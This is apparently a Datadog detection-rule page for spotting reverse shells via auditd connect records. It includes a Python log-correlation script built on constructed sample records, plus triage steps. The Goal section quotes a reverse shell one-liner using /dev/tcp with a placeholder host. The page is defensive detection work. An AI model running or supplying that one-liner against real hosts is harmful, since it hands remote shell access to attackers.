---
title: Auditd remote shell detected
description: Datadog, the leading service for cloud-scale monitoring.
---

# Auditd remote shell detected
- Classification: attack
- Tactic: [TA0011 Command and Control](https://attack.mitre.org/tactics/TA0011)
- Technique: [T1059 Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)
## Goal{% #goal %}

Detect reverse shells (and, more generally, any interactive shell that tunnels itself over a socket) by identifying a `bash` process that itself opens a network connection. A shell dialing out to a remote endpoint, for example `bash -i >& /dev/tcp/<ip>/<port> 0>&1`, is a strong indicator of an interactive session being tunneled over the network, a common post-exploitation step for establishing command and control.

## Strategy{% #strategy %}

This rule correlates two auditd records that share the same `event_id` (the serial number in `msg=audit(timestamp:serial)`): a SYSCALL record showing `bash` (`/usr/bin/bash` or `/bin/bash`) invoking the `connect` syscall, normalized as OCSF Network Activity with activity Open, and a SOCKADDR record carrying the destination socket address passed to that call. Requiring both records on the same audit event ties the destination to the shell process: the SYSCALL record alone proves only that `connect` was called, and the SOCKADDR record alone does not say which process made the call.

Two practical caveats. First, auditd emits these records only if the kernel is told to audit `connect`; a rule such as `-a always,exit -F arch=b64 -S connect -k network_connect` (plus an `arch=b32` counterpart on hosts that run 32-bit binaries) must be loaded, or the detection has nothing to match. Second, `connect` is made by the side that initiates the connection, so this pattern catches a reverse shell, where `bash` dials out; a bind shell, where a listener accepts an inbound connection and hands it to `bash`, does not produce a `connect` from the shell process and needs a different signal.
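
As an added illustration, not Datadog's rule implementation (which operates on OCSF-normalized events), the following Python script performs the same correlation on raw auditd records: it groups SYSCALL and SOCKADDR records by the serial in `msg=audit(ts:serial)`, decodes the hex `saddr` into family, address and port, resolves the `connect` syscall number per architecture from the `arch=` field, and fires only when the executable is `bash`, the call succeeded, and the destination is an IP socket. The sample records, the `network_connect` audit key and the two-entry syscall-number table are constructed for the example.

```python
import re
import socket
import struct
from collections import defaultdict

# connect(2) syscall numbers keyed by the audit arch value exactly as auditd
# logs it in the SYSCALL record's arch= field (table constructed for this example).
CONNECT_BY_ARCH = {
    "c000003e": 42,   # x86_64
    "c00000b7": 203,  # aarch64
}
SHELL_EXES = {"/usr/bin/bash", "/bin/bash"}

# Linux address-family values, used instead of socket.AF_* so the decoder does
# not depend on the platform the script runs on.
AF_UNIX, AF_INET, AF_INET6 = 1, 2, 10

# Constructed sample records, not real captured data. Event 4567 is bash opening
# 192.168.1.5:4444 (should fire), 4568 is curl opening port 80 (should not),
# 4569 is bash whose connect() was refused (exit=-111, ECONNREFUSED).
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1700000000.123:4567): arch=c000003e syscall=42 success=yes exit=0 a0=3 a1=7ffd2c1e3a40 a2=10 a3=0 items=0 ppid=1234 pid=2345 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="bash" exe="/usr/bin/bash" key="network_connect"
type=SOCKADDR msg=audit(1700000000.123:4567): saddr=0200115CC0A801050000000000000000
type=SYSCALL msg=audit(1700000000.456:4568): arch=c000003e syscall=42 success=yes exit=0 a0=5 a1=55d0c0ffee00 a2=10 a3=0 items=0 ppid=2345 pid=2400 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="curl" exe="/usr/bin/curl" key="network_connect"
type=SOCKADDR msg=audit(1700000000.456:4568): saddr=02000050C0A801050000000000000000
type=SYSCALL msg=audit(1700000001.000:4569): arch=c000003e syscall=42 success=no exit=-111 a0=3 a1=7ffd2c1e3a40 a2=10 a3=0 items=0 ppid=1234 pid=2345 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="bash" exe="/usr/bin/bash" key="network_connect"
type=SOCKADDR msg=audit(1700000001.000:4569): saddr=0200115CC0A801050000000000000000
"""

TOKEN_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')
MSG_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")


def parse_record(line):
    """Split one raw auditd record into a dict; event_id is the serial in msg=audit(ts:serial)."""
    fields = {}
    for key, raw, quoted in TOKEN_RE.findall(line):
        fields[key] = quoted if raw.startswith('"') else raw
    m = MSG_RE.search(line)
    fields["event_id"] = m.group(2) if m else None
    return fields


def decode_saddr(saddr_hex):
    """Decode the hex sockaddr from a SOCKADDR record into (family, address, port)."""
    raw = bytes.fromhex(saddr_hex)
    if len(raw) < 2:
        return "other", None, None
    family = struct.unpack_from("<H", raw, 0)[0]   # sa_family_t is host order (little-endian here)
    if family == AF_INET and len(raw) >= 8:
        port = struct.unpack_from("!H", raw, 2)[0]  # sin_port is network byte order
        return "ipv4", socket.inet_ntop(socket.AF_INET, raw[4:8]), port
    if family == AF_INET6 and len(raw) >= 24:
        port = struct.unpack_from("!H", raw, 2)[0]
        return "ipv6", socket.inet_ntop(socket.AF_INET6, raw[8:24]), port  # skips sin6_flowinfo
    if family == AF_UNIX:
        return "unix", raw[2:].split(b"\x00", 1)[0].decode(errors="replace"), None
    return "other", None, None


def correlate(log_text):
    """Group records by event_id and record type, which is the join the rule performs."""
    events = defaultdict(dict)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_record(line)
            events[rec["event_id"]][rec["type"]] = rec
    return events


def detect_shell_connects(log_text, require_success=True):
    """Return one hit per audit event in which bash itself called connect() to an IP endpoint."""
    hits = []
    for event_id, recs in correlate(log_text).items():
        sc, sa = recs.get("SYSCALL"), recs.get("SOCKADDR")
        if sc is None or sa is None:
            continue  # both records on the same event are required
        if sc.get("exe") not in SHELL_EXES:
            continue
        if int(sc.get("syscall", -1)) != CONNECT_BY_ARCH.get(sc.get("arch")):
            continue  # syscall numbers differ per architecture, so resolve via arch=
        if require_success and sc.get("success") != "yes":
            continue
        family, addr, port = decode_saddr(sa.get("saddr", ""))
        if family not in ("ipv4", "ipv6"):
            continue  # a UNIX-domain socket is not a remote shell channel
        hits.append({"event_id": event_id, "pid": sc.get("pid"), "ppid": sc.get("ppid"),
                     "uid": sc.get("uid"), "exe": sc["exe"], "dst_ip": addr,
                     "dst_port": port, "success": sc.get("success")})
    return hits


if __name__ == "__main__":
    for hit in detect_shell_connects(SAMPLE_LOG):
        print(hit)
```

Two design choices are worth noting. The syscall number is resolved through `arch=` rather than hard-coded, because `connect` is 42 on x86_64 but 203 on aarch64, and a detection that only knows one of them silently misses the other. A failed `connect` (`success=no`) is excluded by default to match the page's description of a socket that was actually opened; passing `require_success=False` surfaces attempts as well, which is useful when the attacker's listener was down at the time.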

## Triage and response{% #triage-and-response %}

1. Identify the remote endpoint from `{{@ocsf.dst_endpoint.ip}}` and `{{@ocsf.dst_endpoint.port}}` in the correlated SOCKADDR record, and check whether the SYSCALL record reports `success=yes`: a refused or timed-out `connect` is still an attempt to reach out, but no session was established.
1. Determine the user context of the shell process using `{{@ocsf.actor.user.name}}` on host `{{host}}`, and note the process ID and parent process of the `bash` instance; the parent (for example a web server worker, a cron job, or an SSH session) usually points at the initial access vector.
1. Check for signs of initial access: review authentication logs, web server logs, and any recently executed commands.
1. Isolate the host at the network level if a reverse shell is confirmed and begin incident response. Block the remote IP at the network perimeter.
1. Preserve forensic evidence (process tree, the shell process's open file descriptors and sockets, and memory where possible) before terminating the session, since killing the shell destroys the live socket and its state.
